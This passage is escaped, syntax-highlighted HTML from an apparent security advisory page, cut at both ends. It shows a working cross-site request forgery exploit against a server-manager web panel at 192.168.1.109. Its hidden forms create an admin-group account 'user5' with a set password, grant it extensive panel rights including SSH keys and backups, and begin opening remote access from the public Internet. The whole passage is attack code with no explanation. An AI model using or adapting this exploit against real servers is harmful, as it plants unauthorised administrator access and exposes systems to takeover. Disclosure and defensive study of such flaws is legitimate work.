class=\"crayon-s\">&#8220;Street&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;123+Main+Street&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;City&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Ottawa&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Phone&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;555-5555&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;EmailForward&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;local&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;ForwardAddress&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;VPNClientAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;no&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;groupMemberships&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;admingroup&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Next&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Add&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Set\t<\/span><span class=\"crayon-e\">password\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;2&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;badform_2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/useraccounts&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;4&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;page_stack&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;3&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;.id&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0d41969df339a1a62711edf93f48a673&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;acctName&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;user5&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;password1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;SSDpassword@12345&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;password2&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;SSDpassword@12345&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Next&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Save&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Assign\t<\/span><span class=\"crayon-e\">panel\t<\/span><span class=\"crayon-e\">access\t<\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">More\t<\/span><span class=\"crayon-e\">can\t<\/span><span class=\"crayon-e\">be\t<\/span><span class=\"crayon-e\">added\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">additional\t<\/span><span class=\"crayon-v\">access<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;3&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if3&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;badform_3&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;https:\/\/192.168.1.109\/server-manager\/cgi-bin\/userpanelaccess&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;remoteuseraccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;viewlogfiles&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;groups&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;userpanelaccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;userpanel-password&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;userpanel-sshkeys&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;userpanel-useraccounts&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;panelAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;userpanel-userbackup&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;action&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Modify&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;acct&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;user5&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;state&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;performModifyAccess&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c33d05b501ba709625629-78\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Change\t<\/span><span class=\"crayon-e\">remote\t<\/span><span class=\"crayon-e\">access\t<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Open\t<\/span><span class=\"crayon-e\">up\t<\/span><span class=\"crayon-e\">Remote\t<\/span><span class=\"crayon-e\">Access\t<\/span><span class=\"crayon-e\">from\t<\/span><span class=\"crayon-m\">public<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">Internet<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c33d05b501ba709625629-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;4&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;if4&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;badform_4&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">method<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;post&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">action<\/span><span class=\"crayon-o\">=<\/span><span 